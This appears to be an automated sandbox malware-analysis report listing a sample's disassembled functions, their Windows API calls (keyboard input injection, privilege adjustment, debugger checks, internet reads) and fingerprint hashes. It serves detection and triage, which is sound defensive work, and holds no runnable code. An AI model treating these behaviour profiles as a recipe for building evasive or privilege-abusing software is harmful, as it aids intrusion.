                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                  • String ID:
                                                  • API String ID: 1991900642-0
                                                  • Opcode ID: fcbfda357a480b4c76f4b05450d96c8e6474ecd009e1164555dcf898ffc68267
                                                  • Instruction ID: ff86f9c22814b1e9f28664dffacada08c9dd0f8151d30f69fd418f994c8af76a
                                                  • Opcode Fuzzy Hash: fcbfda357a480b4c76f4b05450d96c8e6474ecd009e1164555dcf898ffc68267
                                                  • Instruction Fuzzy Hash: 4E512871508301AFD710EF64C88AA6BBBE9FFC9754F44492DF58997291EB30D904CB92
                                                  Function 005FAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 005FAAAC
                                                  • SetKeyboardState.USER32(00000080), ref: 005FAAC8
                                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 005FAB36
                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 005FAB88
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 3a99e0ba08c3829a58fade4e8891c1c8b38e492c2a4cd9788aa17a338937c4d5
                                                  • Instruction ID: 84c48138a1a355aaa2d28d1d24c184043c76a572bc3726ec9c67289f746d15fe
                                                  • Opcode Fuzzy Hash: 3a99e0ba08c3829a58fade4e8891c1c8b38e492c2a4cd9788aa17a338937c4d5
                                                  • Instruction Fuzzy Hash: A131E7B0A8064CAEFB358B64CC05BFA7FAABB44320F04461AE689561D1D77D8985C763
                                                  Function 005CBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 005CBB7F
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • GetTimeZoneInformation.KERNEL32 ref: 005CBB91
                                                  • WideCharToMultiByte.KERNEL32(00000000,?,0066121C,000000FF,?,0000003F,?,?), ref: 005CBC09
                                                  • WideCharToMultiByte.KERNEL32(00000000,?,00661270,000000FF,?,0000003F,?,?,?,0066121C,000000FF,?,0000003F,?,?), ref: 005CBC36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                  • String ID:
                                                  • API String ID: 806657224-0
                                                  • Opcode ID: e26dfcbba4dfd98454fec05fa9a4b1dc95a3dfe8edc724d17f364d7ca5fe20f9
                                                  • Instruction ID: c741db5d8625fcc78c4a28f5e26216ad5dcf5f444229775cb6cfb9b5351ef94a
                                                  • Opcode Fuzzy Hash: e26dfcbba4dfd98454fec05fa9a4b1dc95a3dfe8edc724d17f364d7ca5fe20f9
                                                  • Instruction Fuzzy Hash: 9131E170904246DFDB10DFA9CC92A2DBFB9FF46710B18466EE020DB2A1C7709E80DB50
                                                  Function 0060CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 0060CE89
                                                  • GetLastError.KERNEL32(?,00000000), ref: 0060CEEA
                                                  • SetEvent.KERNEL32(?,?,00000000), ref: 0060CEFE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventFileInternetLastRead
                                                  • String ID:
                                                  • API String ID: 234945975-0
                                                  • Opcode ID: f9ff5452f2ae1758de5d7f27d9750bd39a684b11ea42b823634ec69628288826
                                                  • Instruction ID: 55235b9cbe270f95806d66052e41804ed9eb220a6c7058f934bab7dacce7a914
                                                  • Opcode Fuzzy Hash: f9ff5452f2ae1758de5d7f27d9750bd39a684b11ea42b823634ec69628288826
                                                  • Instruction Fuzzy Hash: 4421BDB15407069BD734CF65C948BEB7BFAEF40324F20462EE646D2291E770EE059B60
                                                  Function 005C2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 005C271A
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005C2724
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 005C2731
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 62d4a5997f2c79fc76564ef6c1252e0f5df2b8a6557ca60a53fb5e57b5683af6
                                                  • Instruction ID: 6bb3a728377d4c8762588abaedc212914e6760a396c4cd5083b5cc6259e67f5f
                                                  • Opcode Fuzzy Hash: 62d4a5997f2c79fc76564ef6c1252e0f5df2b8a6557ca60a53fb5e57b5683af6
                                                  • Instruction Fuzzy Hash: 5831C4749012199BCB21DF68DC88BDDBBB8FF08310F5055EAE41CA62A1E7309F818F44
                                                  Function 006051CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 006051DA
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00605238
                                                  • SetErrorMode.KERNEL32(00000000), ref: 006052A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  • Opcode ID: 13ec666d3e6480239b1eb90a45537ffd9d0eb10bb512e627d10adb9e000a82c5
                                                  • Instruction ID: 9bd525f16988f43d0d9d61bfca302f0b690dc9e92e6d15e8d6f8778376601de9
                                                  • Opcode Fuzzy Hash: 13ec666d3e6480239b1eb90a45537ffd9d0eb10bb512e627d10adb9e000a82c5
                                                  • Instruction Fuzzy Hash: 05318E35A00609DFDB00DF54D889EAEBBB5FF48314F048099E805AB3A2DB31E956CB91
                                                  Function 005F16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005B0668
                                                    • Part of subcall function 005AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005B0685
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F170D
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F173A
                                                  • GetLastError.KERNEL32 ref: 005F174A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                  • String ID:
                                                  • API String ID: 577356006-0
                                                  • Opcode ID: 93c984bd0a9ed8e66e862ec6758060519ec55e3da48d28ee3addb752e134dd06
                                                  • Instruction ID: 7b04f570c3c8934b2c44048459420c4594b8af83def68235908b0599e1a6515e
                                                  • Opcode Fuzzy Hash: 93c984bd0a9ed8e66e862ec6758060519ec55e3da48d28ee3addb752e134dd06
                                                  • Instruction Fuzzy Hash: 661194B1404709EFD718AF54DC86D6EBBB9FB44764B20852EE05657241EB70BC418B64
                                                  Function 005FD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005FD608
                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 005FD645
                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005FD650
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                  • String ID:
                                                  • API String ID: 33631002-0
                                                  • Opcode ID: 7f65d962a49c717928770f31af61c2b6e60fce4d3b8b81004e5cc61ac3ee5e66
                                                  • Instruction ID: 348181f769a901bafcf32dfdcbaad7e23af6d05329ba887394bdac8a384e620c
                                                  • Opcode Fuzzy Hash: 7f65d962a49c717928770f31af61c2b6e60fce4d3b8b81004e5cc61ac3ee5e66
                                                  • Instruction Fuzzy Hash: C2115E75E05228BFDB208F95DC45FAFBFBDEB45B60F108115F904E7290D6704A058BA1
                                                  Function 005F1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005F168C
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005F16A1
                                                  • FreeSid.ADVAPI32(?), ref: 005F16B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: 901786a6ff0ec69e49b8e108641b34c063a5a86b324ac4bc5d9541c450890777
                                                  • Instruction ID: aa345763516f2bf17a724c433d37d6f0a1ee0fbb92385fbd39184c9d065b2e3f
                                                  • Opcode Fuzzy Hash: 901786a6ff0ec69e49b8e108641b34c063a5a86b324ac4bc5d9541c450890777
                                                  • Instruction Fuzzy Hash: F6F0447194030DFBDB00CFE08C89EAEBBBDFB08250F104460E500E2180E335AA448A54
                                                  Function 005B4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(005C28E9,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002,00000000,?,005C28E9), ref: 005B4D09
                                                  • TerminateProcess.KERNEL32(00000000,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002,00000000,?,005C28E9), ref: 005B4D10
                                                  • ExitProcess.KERNEL32 ref: 005B4D22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 88541bd624af911c05e3b711a91b91e3f0bdb013e1eaa5d762d0896810d13555
                                                  • Instruction ID: 09f114a6a810074ebe680dfcbe7d9c76be46f2ff7289fd666003e3417dde14d9
                                                  • Opcode Fuzzy Hash: 88541bd624af911c05e3b711a91b91e3f0bdb013e1eaa5d762d0896810d13555
                                                  • Instruction Fuzzy Hash: E0E0B631000949AFCF31AF54DD0EA983F6AFB817A5B208418FC058A123CB35ED52DF84
                                                  Function 005ED27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,?), ref: 005ED28C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID: X64
                                                  • API String ID: 2645101109-893830106
                                                  • Opcode ID: 5d63dd1877a667f51f14df1a71cc815a67f2d64fce2827c1b943ecc8618ef457
                                                  • Instruction ID: ad05f61fcad792fe3d67aa2326bbc2966aabc0dfce553060aa8337f779be7a4e
                                                  • Opcode Fuzzy Hash: 5d63dd1877a667f51f14df1a71cc815a67f2d64fce2827c1b943ecc8618ef457
                                                  • Instruction Fuzzy Hash: F6D0C9B480111DEACB94DB90DC88DDDB77CBB04305F100551F506A2000D73495499F20
                                                  Function 005BCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                  • Instruction ID: a5857645912852673930e59c18ee8051b556d09a928d2a4d99e0d9a8e118c553
                                                  • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                  • Instruction Fuzzy Hash: 50020B71E001199BDF14CFA9C8806EEBFB5FF98314F25416AD819EB385D731AD418B94
                                                  Function 0059CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable is not of type 'Object'.$p#f
                                                  • API String ID: 0-4110578496
                                                  • Opcode ID: b2e7a9e920f466f3999089a79d124acc8f8f74054a4200369105320782d32ae9
                                                  • Instruction ID: fa4e09c10790a7795e45c76ba6a96040b1d24ae8272d183fdcc6d55d77e9997b
                                                  • Opcode Fuzzy Hash: b2e7a9e920f466f3999089a79d124acc8f8f74054a4200369105320782d32ae9
                                                  • Instruction Fuzzy Hash: 3F32DE70900219DFDF18DF90C989AEDBFB9FF45304F644069E846AB282D775AE85CB60
                                                  Function 006068EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00606918
                                                  • FindClose.KERNEL32(00000000), ref: 00606961
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 7d69065fa6ea0d885dba44d733222287a9a0d13d4bf24623af60b85a69a05cb5
                                                  • Instruction ID: 57a9dd47aa318bd5ec15e9bb24958371edf3b639204346af0b00630a2b5fc0e6
                                                  • Opcode Fuzzy Hash: 7d69065fa6ea0d885dba44d733222287a9a0d13d4bf24623af60b85a69a05cb5
                                                  • Instruction Fuzzy Hash: FA11B2316046029FC714DF29D488A1ABBE5FF89328F14C699F4698F7A2DB30EC05CB91
                                                  Function 006037B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00614891,?,?,00000035,?), ref: 006037E4
                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00614891,?,?,00000035,?), ref: 006037F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: 8fa19ce60be892d855fb51d984d29cd6e1bc4350670523118229420b05f7104c
                                                  • Instruction ID: 0d0d75bc9f180d3acd734a09f95dbbec2604812038d990ac1a32df29fa5a8df8
                                                  • Opcode Fuzzy Hash: 8fa19ce60be892d855fb51d984d29cd6e1bc4350670523118229420b05f7104c
                                                  • Instruction Fuzzy Hash: 1DF0A0B06053296AEB2057AA8C4DFEB3AAEEFC8771F000266B509D2281D9609905C6B0
